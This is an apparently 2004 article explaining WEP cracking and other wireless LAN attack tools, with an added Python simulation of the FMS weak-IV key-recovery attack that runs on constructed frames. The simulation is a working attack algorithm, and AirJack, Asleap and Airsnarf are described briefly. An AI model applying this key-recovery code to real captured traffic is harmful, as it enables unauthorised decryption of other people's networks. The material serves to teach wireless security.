There are many attack methods used to prey upon common wireless LAN vulnerabilities. Perhaps the best known of these is WEPcrack. WEPcrack and similar key-cracking tools (AirSnort, aircrack) take advantage of weaknesses in the Wired Equivalent Privacy (WEP) protocol originally used to encrypt traffic over 802.11 connections. WEP encrypts each frame with RC4, keyed with a 24-bit initialization vector (IV), sent in the clear, prepended to the shared secret key. Fluhrer, Mantin and Shamir showed in 2001 that for certain "weak" IVs the first byte of RC4 keystream leaks one byte of the key, and because every 802.11 data frame begins with the same LLC/SNAP byte (0xAA), the first keystream byte can be read off every captured frame. WEPcrack therefore captures traffic, keeps the frames that carry weak IVs, and tallies a candidate value for each key byte; once enough such frames have been collected (millions of packets for the original attack), the correct value stands out statistically and the whole key is recovered, after which the attacker can decrypt all captured and future traffic. The same property underlies a simpler attack that needs no key at all: because the keystream depends only on the IV and the key, a frame with known plaintext gives away the keystream for its IV, and any later frame sent under that IV can be decrypted with it. Many vendors have since filtered out the weak IVs that the original attack relies on, which increases the capture time, but that is not a fix: later statistical attacks (KoreK's, and the PTW attack) work with ordinary IVs and need far fewer packets, so a WEP key should be treated as recoverable by anyone who can sniff the network. For better protection, most WLAN products now offer safer alternatives to WEP: WPA with TKIP (still RC4, but with per-packet keys and a message integrity check) or WPA2 with AES-CCMP. For a primer on WLAN security, read the Wi-Fi Alliance security page.
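As an added example, not code from the original article or from WEPcrack itself, the script below simulates the FMS weak-IV attack end to end: it builds a constructed capture of WEP frames whose IVs fall in the weak (B+3, 255, X) class, keeps only the first ciphertext byte of each frame (all an attacker needs, since the first plaintext byte is the known 0xAA), tallies key-byte candidates, and recovers the 40-bit key. The key, the frames, the IV pattern and every function name are assumptions made up for the simulation; nothing here touches a network.

```python
# Added example (not from the original article or from WEPcrack): a self-contained
# simulation of the FMS weak-IV attack on WEP. The key, IVs and frames below are
# constructed in-process; nothing touches a real network.
from collections import Counter

SNAP_DSAP = 0xAA  # first payload byte of every 802.11 data frame (LLC/SNAP header)

def ksa(key):
    """RC4 key scheduling. For WEP the key is IV (3 bytes) || shared secret."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    return S

def prga(S, n):
    """RC4 output: n keystream bytes from a scheduled state (the state is copied, not modified)."""
    S = S[:]
    i = j = 0
    out = []
    for _ in range(n):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return out

def wep_encrypt(secret, iv, plaintext):
    """WEP: the IV travels in the clear; the payload is XORed with RC4(IV || secret)."""
    keystream = prga(ksa(list(iv) + list(secret)), len(plaintext))
    return bytes(iv), bytes(p ^ k for p, k in zip(plaintext, keystream))

def simulate_capture(secret):
    """Constructed capture: one frame for every FMS weak IV (B+3, 255, X), B over the
    key bytes. On a real network these IVs turn up a few at a time, which is why
    the tools need millions of frames. Only (IV, first ciphertext byte) is kept."""
    packets = []
    for B in range(len(secret)):
        for X in range(256):
            iv, ct = wep_encrypt(secret, (B + 3, 255, X), bytes([SNAP_DSAP, 0xAA, 0x03]))
            packets.append((iv, ct[0]))
    return packets

def fms_votes(packets, known_prefix):
    """Tally FMS candidates for secret-key byte B = len(known_prefix).

    For each frame run only the first B+3 KSA steps (IV plus the key bytes already
    recovered). If the state is 'resolved' (S[1] < B+3 and S[1] + S[S[1]] == B+3),
    then with ~5% probability the first keystream byte z is the value swapped into
    S[B+3] at step B+3; that step's j and S[B+3] are known, so the key byte can be
    solved for. Frames where the state was disturbed later vote for random values."""
    B = len(known_prefix)
    votes = Counter()
    for iv, c0 in packets:
        key = list(iv) + list(known_prefix)
        S = list(range(256))
        j = 0
        for i in range(B + 3):
            j = (j + S[i] + key[i]) % 256
            S[i], S[j] = S[j], S[i]
        if S[1] >= B + 3 or (S[1] + S[S[1]]) % 256 != B + 3:
            continue  # not resolved: this frame says nothing about byte B
        z = c0 ^ SNAP_DSAP  # known plaintext exposes the first keystream byte
        votes[(S.index(z) - j - S[B + 3]) % 256] += 1
    return votes

def key_matches(candidate, packets, n=4):
    """Confirm a complete candidate key by regenerating the first keystream byte of a few frames."""
    return all(prga(ksa(list(iv) + list(candidate)), 1)[0] == (c0 ^ SNAP_DSAP)
               for iv, c0 in packets[:n])

def recover_key(packets, key_len, fudge=4, prefix=()):
    """Recover the key byte by byte. The best-voted candidate is usually right but not
    always, so try the `fudge` top candidates at each position (the same idea as
    aircrack's fudge factor) and verify each complete key against the capture."""
    if len(prefix) == key_len:
        return bytes(prefix) if key_matches(prefix, packets) else None
    votes = fms_votes(packets, prefix)
    for k in sorted(range(256), key=lambda v: -votes[v])[:fudge]:
        found = recover_key(packets, key_len, fudge, prefix + (k,))
        if found is not None:
            return found
    return None

if __name__ == "__main__":
    SECRET = bytes([0x1F, 0x8B, 0x00, 0xC7, 0x42])  # constructed 40-bit WEP key
    capture = simulate_capture(SECRET)
    print("frames captured:", len(capture))
    print("recovered key:", recover_key(capture, len(SECRET)).hex())
```

The resolved-state check is what lets the attack ignore most captured frames cheaply: only B+3 RC4 steps are run per frame, and the full 256-step schedule is needed only to verify a complete candidate. Filtering weak IVs in the access point removes exactly the (B+3, 255, X) frames this simulation relies on, which is why it slows the original attack down without protecting the key against the later attacks mentioned above.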
Some of the other tools and techniques used to attack wireless LANs include denial-of-service tools like AirJack (which forges 802.11 management frames such as deauthentication, knocking clients off the network or setting up a man-in-the-middle), password dictionary attack tools like Asleap (which runs an offline dictionary attack against captured Cisco LEAP challenge/response exchanges), and rogue wireless access point tools like Airsnarf (which stands up a look-alike access point with a captive portal to harvest user credentials). You can find literally hundreds of white papers about WLAN Security at the CWNP Learning Center. Many of those papers describe WLAN attack methods and tools (free registration required to view most papers). If you browse around the Internet a bit, you'll easily find several websites dedicated to listing WLAN attack tools and describing what they do.
This was first published in September 2004